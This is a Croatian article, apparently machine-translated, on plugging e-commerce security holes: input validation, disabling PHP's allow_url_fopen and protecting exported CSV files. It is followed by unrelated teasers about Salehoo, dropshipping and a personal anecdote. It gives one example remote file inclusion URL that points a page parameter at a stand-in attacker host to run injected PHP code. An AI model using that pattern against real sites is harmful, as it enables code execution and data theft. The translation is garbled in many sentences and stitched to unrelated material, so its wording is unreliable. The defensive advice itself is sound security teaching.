Sigurnost u e-commerce web stranice treba biti jedan od glavnih obzir prilikom razvoja e-commerce web stranice ili softver. Developer mora biti svjestan svih sigurnosnih aspekata pri dizajniranju stranice. S e-trgovina postaju uobičajena pojava ovih dana, broj sigurnosnih napada svakako je u porastu. Paranoja je zdrava stvar za e-commerce web programeri, trebamo držati do vrata sa sigurnosnim pitanjima, i držati naše uši i oči otvorene. Iako su sljedeći puškarnica ozbiljno, ako su prisutni sljedeći puškarnicama se lako ispraviti.
Ispod su neki sigurnosnih aspekata biti uključeni pri razvoju stranice. Ovaj članak ne obuhvaća e-shoplifting, pogledajte moj poseban članak na ovaj.
Korisnički ulaz - svaki unos, bilo da se ulazak u količini, u potrazi za proizvod, upisivanje imena i sl., treba biti validirane za sumnjive likove. Ako to nije učinjeno, moguće je ući "?>", zatvaranje kraja oznake za PHP i izvršiti neke PHP kod.
To je daleko sigurnije dopustiti brojeve i slova AZ (metropola uključen) i 0-9 i ništa drugo, nego napraviti popis svih znakova koji se ne bi trebao biti tamo. Ovjera skripta treba da biste se pomicali kroz svaki znak jednog po jednog. To treba postići koristeći na strani poslužitelja valjanosti, a ne Javascript. Korištenje server strani ulaznih valjanosti je neophodno da bi se neželjenih znakova
Postoji još jedan veliki kada izvršavanju PHP kod. Kada se koriste PHP postoji postavka zove allow_url_fopen koja omogućava otvaranje datoteka iz PHP skripte. Ova postavka bi trebao biti isključen, osim ako je apsolutno neophodno.
Pravedan zamisliti ste PHP skripti za fiksne zaglavlja i podnožja, a za pristup web stranicama možete upisati u http://www.mysite.com/index.php?page=page2. Sve što je potrebno je zloban korisnik to trčanje original mijenjanjem tih parametara tako da upišete u "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" s neki PHP kod u datoteku "hacker.txt". Možete imati ništa dogoditi, PHP datoteke pročitati, izbrisati, vitalne informacije ukraden.
Ako ste ne siguran ako ovaj je postavka ili isključiti, molimo kopirajte sljedeći PHP kod u tekstualnu datoteku i upload na svoju web poslužitelja:
phpinfo ();
?>
Kada pristupiti svom skriptu na vaš web poslužitelj, te bi trebao naići postavljanje allow_url_fopen pod konfiguracijom.
Korisničko računalo, pod normalnim okolnostima ne može pronaći vrijednost ove postavke.
Budite oprezni izvezenih podataka kao što su narudžbe, proizvodi i MySQL u CSV datoteke. Ako ove podatke je izvezeno iz skripte i čuva na web server pod zajednički naziv datoteke, tj.. http://www.mysite.com/admin/output_tables.csv. Ovo je samo stvarno problem kada izvoze podatke boravi u datoteku u direktoriju koji je javno dostupan. Postoji dva načina da spriječi ovu sigurnosti puškarnica - Prvo su izlazne datoteke iza lozinkom zaštićeni direktorij, kao drugo imaju podatke obrasca nalazi se unutar HTML textarea element na original. Storeowner tada mogu kopirati podatke iz ove textfile i stvoriti novu datoteku na svoje računalo i zalijepite informacija ovdje.
Sve što je potrebno je haker pronaći ovo ime datoteke mimo ček vanjska strana e-commerce demo softvera za web stranice i potražite iste datoteke na stvarnom mjestu.
Ispod su dodatne članke vezane za gore navedene članku iz "Ecommerce" članak kategoriji.
Ljudi zainteresirani za gore navedene članku "E-Commerce Sigurnost - plugging sigurnosne rupe" su također zainteresirani za srodnih članaka navedene u nastavku:
Running e-commerce poslovanja nije samo o održavanju web stranice gore i trčanje. Korisnici se oslanjaju na svoju sposobnost da im služe putem telefona, telefaksa, e-mail, ili drugim sredstvima, a to zahtijeva sve svoje sustave kako bi se raditi da bi mogli ispuniti zahtjeve kupca.
Samo nekoliko dana leđa sam bio vlasništvo razgovor s mojim prijateljem. On je slavio beba's 1. rođendan i da je to trčanje između svojoj rodnoj u Kerali i Chennai, svog radnog mjesta. On i njegova bolja polovina putovali između tih mjesta najmanje 4 puta u posljednjih mjesec dana.
Ako ste radili na e-trgovinu za bilo koji iznos od vrijeme, od vas će znati da postoji više nego pravi scamers pružateljima usluga veleprodaje dropship imenik. U svijetu e-poslovanja, Salehoo and Worldwide Proizvođači su i renomirani pružatelji usluga koje su stekle popularnost u posljednjih nekoliko godina.
Ako ste ikad bili online trgovac, vjerojatno ste već čuli o Salehoo ili čak ga koristi za svoju korist. Ako ste upravo počinju se sa svoje poslovanje, možda ćete biti zbunjeni s mješovitim Salehoo recenzija vani. Sada, neka nam se pogled na ono što je stvarno Salehoo sve o uslugama i oni nude za koje mnogi imaju tendenciju da se ureći.
Koliko ljudi znate da ste kupili nešto online? Ako je Vaš poput mene sasvim malo, taj 'zašto ecommerce je u svijetu nova on-line shopping centar. Ali tko radi ove online maloprodaje? Ljudi poput vas i mene, to je razlog zašto ovaj posao cvate i da će nastaviti da bum sada i dobro u budućnosti.
Ako ste veliki obožavatelj najnovijih elektroničkih proizvoda, možda ćete biti napastovan od ideja vođenja vlastite online elektronika posao. Nije da je teško da bi počeli kada se u potpunosti iskoriste pravo kap utovar elektronika uslugu i ima dosta za vas to izabrati.
Jeste li ikada otići u svoj lokalni pogodnost dućan i pitam se što bi bilo kao da te je u vlasništvu? Biste li biti dobar vlasnik, će ljudi poput vas? Pa ovaj članak će vam pokazati prednosti posjedovanje vlastite online trgovini, ili poznatiji kao e-trgovina koja se razlikuje od stvarnih lokalnih prikladnost pohraniti.
